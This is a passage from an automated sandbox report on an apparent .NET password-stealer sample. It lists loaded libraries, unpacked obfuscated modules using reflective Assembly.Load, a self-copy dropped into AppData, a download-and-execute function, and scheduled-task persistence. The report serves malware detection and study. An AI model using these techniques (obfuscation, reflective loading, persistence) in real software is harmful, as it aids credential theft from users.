            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: wGsy.pdb source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ZRuVeAoBoxootS.exe.0.dr
            Source: Binary string: wGsy.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ZRuVeAoBoxootS.exe.0.dr

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, MainForm.cs.Net Code: InitializeComponent
            Source: ZRuVeAoBoxootS.exe.0.dr, MainForm.cs.Net Code: InitializeComponent
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fda26c.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.3029ba0.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.cs.Net Code: MP5mMDDXXf System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.301c9f0.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fcda44.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.cs.Net Code: MP5mMDDXXf System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.5830000.7.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 10.2.ZRuVeAoBoxootS.exe.299d9d4.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: 0xFB34CD15 [Sun Jul 22 09:59:49 2103 UTC]
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,16_2_0041A8DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071E3DC3 push esi; ret 0_2_071E3DC7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeCode function: 0_2_071E04E5 push edi; ret 0_2_071E04E6
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_04F0EB08 pushfd ; iretd 10_2_04F0EB09
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_04F31760 pushfd ; iretd 10_2_04F3176E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_04F3DDB0 push eax; mov dword ptr [esp], ecx10_2_04F3DDC4
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_07153DC3 push esi; ret 10_2_07153DC7
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 10_2_071504E5 push edi; ret 10_2_071504E6
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004000D8 push es; iretd 16_2_004000D9
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0040008C push es; iretd 16_2_0040008D
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004542E6 push ecx; ret 16_2_004542F9
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0045B4FD push esi; ret 16_2_0045B506
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00432BD6 push ecx; ret 16_2_00432BE9
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00454C08 push eax; ret 16_2_00454C26
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeStatic PE information: section name: .text entropy: 7.889865290464799
            Source: ZRuVeAoBoxootS.exe.0.drStatic PE information: section name: .text entropy: 7.889865290464799
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fda26c.1.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fda26c.1.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.3029ba0.3.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.3029ba0.3.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, EfxCjuFBDrNuN7uJX7.csHigh entropy of concatenated method names: 'TBU1CCAT02', 'PZq1uGawfP', 'FwT1IHX7OG', 'hvP191NwF2', 'GjB1ZGBMJg', 'mJK1gwrPKV', 'Wyr1XuL1bs', 'I0u1ViqFM7', 'JQW1KsyRXi', 'Xft1bX8RmG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, lkuJijGJA6QitIMHQK.csHigh entropy of concatenated method names: 'TnIqFhnNMi', 'AFiq38Zdfn', 'RA2qvnpdVo', 'SZwqJtjQef', 'z8kqLCUIU9', 'UKXq0HEgNS', 'rjCqRHpLNv', 'rnvqejk0bn', 'BDCqpEsfRS', 'xoDqlWmh7i'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, I7aJyVNsghslwdtrVG.csHigh entropy of concatenated method names: 'IEFMtjqse', 'iTODn32aG', 'rcnj0FY1q', 'SB2y6rQOO', 'iqb3rN5j0', 'yYIwITMcP', 'jNcv1o7JKRwElev7Kk', 'krJbuYrFu6BSWjtW37', 'N5G4HB3wd', 'dkNiGBACT'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, HyKoFt1awVqhaZRMxC.csHigh entropy of concatenated method names: 'Dispose', 'NGkYK4ybIn', 'WTjNJxJYyf', 'qoFxxJtpup', 'Va9YbxTZu9', 'cYVYzX61fM', 'ProcessDialogKey', 'Pn4N2mOjkR', 'OyiNYXYMj6', 'DGiNNowNl3'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, OlwxSt3SLygh9HEPRe.csHigh entropy of concatenated method names: 'EdLTD4rYgy', 'LPoTjF820l', 'EBhTFYxLrv', 'XJfT3xVNHq', 'lVlTaZEUv3', 'eSOTrSYGhV', 'Tw9TcLpxgq', 'R3gT4UR64U', 'nbRT5RNW9L', 'VegTi66q92'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, MnuU6QzJsDF6PVTCy9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrn5q1Lj2H', 'Jec5awT7HL', 'OnD5rQAXGd', 'edK5c5BBj7', 'ybM54Wf8jS', 'owE55TtWQN', 'dyh5iKL6Ho'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, bOBVVhEMRC4cWwkxdR.csHigh entropy of concatenated method names: 'PL2hoYLtmC', 'mw1hQvEoiq', 'xXvh1ko1hd', 'NshhTmKtnb', 'ehMhsXWEeh', 'RQRhST9LYa', 'dLNh8sTY8V', 'IZvhE219Fb', 'JWFhBDNVj3', 'pp9hAUmyMf'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, rmOjkRKpyiXYMj6yGi.csHigh entropy of concatenated method names: 'tVZ4vKASYd', 'bYF4JJ66I9', 'Ghd4OGLcVq', 'fiW4LMhf4c', 'G5T4CDgGLe', 'kQF40hpGlr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, o9xTZuV9hYVX61fMGn.csHigh entropy of concatenated method names: 'Piy4Q0IsUi', 'iIy41irODR', 'aJL4TQiBkX', 'nic4soAnlJ', 'NTj4SkinHl', 'Rgt48V2n96', 'eM24E5mahX', 'gnt4BAWuTO', 'ljQ4AqLMHN', 'FtL4nNJB02'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, T0le2hY2rtIJPNaxna6.csHigh entropy of concatenated method names: 'F5J5kWV3d8', 'SIv5fRXJPT', 'jrP5MFOd5N', 'gus5DBBqhN', 'l0Q57u1KbD', 'mk25j7S3DS', 'T4l5ywNUl9', 'TiA5FV6RMb', 'kxv53PZsZX', 'BV15wJuAl8'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, XfmVEBR51QqlUKyLtF.csHigh entropy of concatenated method names: 'oC68Qi8gG5', 'zHp8Tm0XhP', 'LUA8SZbiI6', 'XrrSbvaOqg', 'Pr8Sz4FAUw', 'bDB82JNMuk', 'gGL8Y3QdOa', 'r8O8NjFJbc', 'WQH8hx3qxy', 'H1h8mNKJQx'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, h2aH3Zw7YiXsYvfS8o.csHigh entropy of concatenated method names: 'oiSs71gP9h', 'js9syAupJF', 'LDWTO4p3GE', 'ILDTLU4jFQ', 'Ua3T0oCYeZ', 'BYUTWk7ZOP', 'MODTRY6KkR', 'JFNTeeoSIl', 'CxITU8Yl3m', 'fSWTpgKtaw'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, AYNBkYmfaoQBEXCiUE.csHigh entropy of concatenated method names: 'IVwY8fxCju', 'lDrYENuN7u', 'vSLYAygh9H', 'kPRYneT2aH', 'GfSYa8odvi', 'Cb6YrSAUsK', 'sHfcNX06N4fGkTH61i', 'GhFA1oGUwWO5rTCfHS', 'pNiYY9GDlG', 'lHUYhclGxS'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, GQRECeC3l81YAYQ30a.csHigh entropy of concatenated method names: 'SNLapDJay7', 'jZga6SH1My', 'dAgaCmd8FQ', 'XIfauSDTEH', 'iAmaJIU9UO', 'UHYaOtayXJ', 'DtwaL6KjK1', 'T2ia0vGXvf', 'ehGaWBr6Cf', 'DXoaR90KsS'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, cPlswiYh05wBgPDnxUk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YtUiCUwKlJ', 'FiaiuDBA7Q', 'A8hiI17tUZ', 'gv3i9C93hv', 'OpRiZ1R7Wi', 'XEQigpwuKQ', 'jFiiXTFiVn'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, wvijb6vSAUsKHvHnSp.csHigh entropy of concatenated method names: 'KdFSojbX83', 'FlhS12VQxR', 'x5pSsfwmaG', 'CLgS8HyUbT', 'GyISEicECP', 'NYHsZOEqTa', 'dehsgbjhOy', 'qCAsXmqh5A', 'KJRsV83yh0', 'DmfsKuxOTp'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, uaPTeHgKCLb8SQmwLp.csHigh entropy of concatenated method names: 't85cVyNwsT', 'WP1cbyNmtS', 'z1342myyaX', 'TFZ4YkW8uc', 'FXwclfmTtT', 'Y68c6TElhn', 'Pp0cGBVXUl', 'f5ncCydqow', 'P0bcuwyrlA', 'hj6cIxXmJI'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, ewNl33b2siSM29DQHA.csHigh entropy of concatenated method names: 'x7H5YqtmE6', 'dX05hACy36', 'HcG5mTDJlq', 'tUs5QPNJsA', 'nel51cN6RM', 'Ikb5sc4kDe', 'OPb5SMrLkn', 'ogU4X6ZYmw', 'HEe4VLScG9', 'gjb4KEG767'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.81e0000.8.raw.unpack, gbF8glUNGRlbMNV65a.csHigh entropy of concatenated method names: 'Wf88k8R4Vr', 'vTs8fyRjZk', 'u1u8Muivvk', 'Gji8DNLQND', 'IfH8786dSY', 'biP8jcZ3ra', 'YwA8y75RXu', 'o8v8F21eln', 'DTP83usHPV', 'mqN8wcIjvw'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.301c9f0.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.301c9f0.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fcda44.2.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.2fcda44.2.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, EfxCjuFBDrNuN7uJX7.csHigh entropy of concatenated method names: 'TBU1CCAT02', 'PZq1uGawfP', 'FwT1IHX7OG', 'hvP191NwF2', 'GjB1ZGBMJg', 'mJK1gwrPKV', 'Wyr1XuL1bs', 'I0u1ViqFM7', 'JQW1KsyRXi', 'Xft1bX8RmG'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, lkuJijGJA6QitIMHQK.csHigh entropy of concatenated method names: 'TnIqFhnNMi', 'AFiq38Zdfn', 'RA2qvnpdVo', 'SZwqJtjQef', 'z8kqLCUIU9', 'UKXq0HEgNS', 'rjCqRHpLNv', 'rnvqejk0bn', 'BDCqpEsfRS', 'xoDqlWmh7i'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, I7aJyVNsghslwdtrVG.csHigh entropy of concatenated method names: 'IEFMtjqse', 'iTODn32aG', 'rcnj0FY1q', 'SB2y6rQOO', 'iqb3rN5j0', 'yYIwITMcP', 'jNcv1o7JKRwElev7Kk', 'krJbuYrFu6BSWjtW37', 'N5G4HB3wd', 'dkNiGBACT'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, HyKoFt1awVqhaZRMxC.csHigh entropy of concatenated method names: 'Dispose', 'NGkYK4ybIn', 'WTjNJxJYyf', 'qoFxxJtpup', 'Va9YbxTZu9', 'cYVYzX61fM', 'ProcessDialogKey', 'Pn4N2mOjkR', 'OyiNYXYMj6', 'DGiNNowNl3'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, OlwxSt3SLygh9HEPRe.csHigh entropy of concatenated method names: 'EdLTD4rYgy', 'LPoTjF820l', 'EBhTFYxLrv', 'XJfT3xVNHq', 'lVlTaZEUv3', 'eSOTrSYGhV', 'Tw9TcLpxgq', 'R3gT4UR64U', 'nbRT5RNW9L', 'VegTi66q92'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, MnuU6QzJsDF6PVTCy9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qrn5q1Lj2H', 'Jec5awT7HL', 'OnD5rQAXGd', 'edK5c5BBj7', 'ybM54Wf8jS', 'owE55TtWQN', 'dyh5iKL6Ho'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, bOBVVhEMRC4cWwkxdR.csHigh entropy of concatenated method names: 'PL2hoYLtmC', 'mw1hQvEoiq', 'xXvh1ko1hd', 'NshhTmKtnb', 'ehMhsXWEeh', 'RQRhST9LYa', 'dLNh8sTY8V', 'IZvhE219Fb', 'JWFhBDNVj3', 'pp9hAUmyMf'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, rmOjkRKpyiXYMj6yGi.csHigh entropy of concatenated method names: 'tVZ4vKASYd', 'bYF4JJ66I9', 'Ghd4OGLcVq', 'fiW4LMhf4c', 'G5T4CDgGLe', 'kQF40hpGlr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, o9xTZuV9hYVX61fMGn.csHigh entropy of concatenated method names: 'Piy4Q0IsUi', 'iIy41irODR', 'aJL4TQiBkX', 'nic4soAnlJ', 'NTj4SkinHl', 'Rgt48V2n96', 'eM24E5mahX', 'gnt4BAWuTO', 'ljQ4AqLMHN', 'FtL4nNJB02'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, T0le2hY2rtIJPNaxna6.csHigh entropy of concatenated method names: 'F5J5kWV3d8', 'SIv5fRXJPT', 'jrP5MFOd5N', 'gus5DBBqhN', 'l0Q57u1KbD', 'mk25j7S3DS', 'T4l5ywNUl9', 'TiA5FV6RMb', 'kxv53PZsZX', 'BV15wJuAl8'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, XfmVEBR51QqlUKyLtF.csHigh entropy of concatenated method names: 'oC68Qi8gG5', 'zHp8Tm0XhP', 'LUA8SZbiI6', 'XrrSbvaOqg', 'Pr8Sz4FAUw', 'bDB82JNMuk', 'gGL8Y3QdOa', 'r8O8NjFJbc', 'WQH8hx3qxy', 'H1h8mNKJQx'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, h2aH3Zw7YiXsYvfS8o.csHigh entropy of concatenated method names: 'oiSs71gP9h', 'js9syAupJF', 'LDWTO4p3GE', 'ILDTLU4jFQ', 'Ua3T0oCYeZ', 'BYUTWk7ZOP', 'MODTRY6KkR', 'JFNTeeoSIl', 'CxITU8Yl3m', 'fSWTpgKtaw'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, AYNBkYmfaoQBEXCiUE.csHigh entropy of concatenated method names: 'IVwY8fxCju', 'lDrYENuN7u', 'vSLYAygh9H', 'kPRYneT2aH', 'GfSYa8odvi', 'Cb6YrSAUsK', 'sHfcNX06N4fGkTH61i', 'GhFA1oGUwWO5rTCfHS', 'pNiYY9GDlG', 'lHUYhclGxS'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, GQRECeC3l81YAYQ30a.csHigh entropy of concatenated method names: 'SNLapDJay7', 'jZga6SH1My', 'dAgaCmd8FQ', 'XIfauSDTEH', 'iAmaJIU9UO', 'UHYaOtayXJ', 'DtwaL6KjK1', 'T2ia0vGXvf', 'ehGaWBr6Cf', 'DXoaR90KsS'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, cPlswiYh05wBgPDnxUk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YtUiCUwKlJ', 'FiaiuDBA7Q', 'A8hiI17tUZ', 'gv3i9C93hv', 'OpRiZ1R7Wi', 'XEQigpwuKQ', 'jFiiXTFiVn'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, wvijb6vSAUsKHvHnSp.csHigh entropy of concatenated method names: 'KdFSojbX83', 'FlhS12VQxR', 'x5pSsfwmaG', 'CLgS8HyUbT', 'GyISEicECP', 'NYHsZOEqTa', 'dehsgbjhOy', 'qCAsXmqh5A', 'KJRsV83yh0', 'DmfsKuxOTp'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, uaPTeHgKCLb8SQmwLp.csHigh entropy of concatenated method names: 't85cVyNwsT', 'WP1cbyNmtS', 'z1342myyaX', 'TFZ4YkW8uc', 'FXwclfmTtT', 'Y68c6TElhn', 'Pp0cGBVXUl', 'f5ncCydqow', 'P0bcuwyrlA', 'hj6cIxXmJI'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, ewNl33b2siSM29DQHA.csHigh entropy of concatenated method names: 'x7H5YqtmE6', 'dX05hACy36', 'HcG5mTDJlq', 'tUs5QPNJsA', 'nel51cN6RM', 'Ikb5sc4kDe', 'OPb5SMrLkn', 'ogU4X6ZYmw', 'HEe4VLScG9', 'gjb4KEG767'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, gbF8glUNGRlbMNV65a.csHigh entropy of concatenated method names: 'Wf88k8R4Vr', 'vTs8fyRjZk', 'u1u8Muivvk', 'Gji8DNLQND', 'IfH8786dSY', 'biP8jcZ3ra', 'YwA8y75RXu', 'o8v8F21eln', 'DTP83usHPV', 'mqN8wcIjvw'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.5830000.7.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.5830000.7.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 10.2.ZRuVeAoBoxootS.exe.299d9d4.3.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 10.2.ZRuVeAoBoxootS.exe.299d9d4.3.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004063C6 ShellExecuteW,URLDownloadToFileW,16_2_004063C6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeFile created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
